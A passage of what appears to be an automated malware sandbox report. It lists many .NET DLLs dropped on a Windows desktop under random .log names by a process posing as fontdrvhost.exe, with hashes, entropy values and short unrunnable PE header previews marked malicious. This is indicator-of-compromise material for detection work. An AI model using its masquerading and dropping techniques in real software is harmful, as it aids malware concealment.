                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\GPSaXBQY.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\GspafaHt.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\HlvZPcYC.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\HuSZzPsz.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\HxFJRUCD.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\IHwzgXOR.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\IbKgwPay.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\IdUqmnRm.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\IiRYzRio.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\IsWIxvZJ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\JAxqeOaQ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\JavyIngh.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\JfyqGcCs.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\JvAHRkKP.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\KOmOGvDg.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\KWVhlfdm.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\KjbhtTTT.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\KnZYovDz.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\KszgdGmQ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\LovAYRCw.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\LtTWIWgh.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
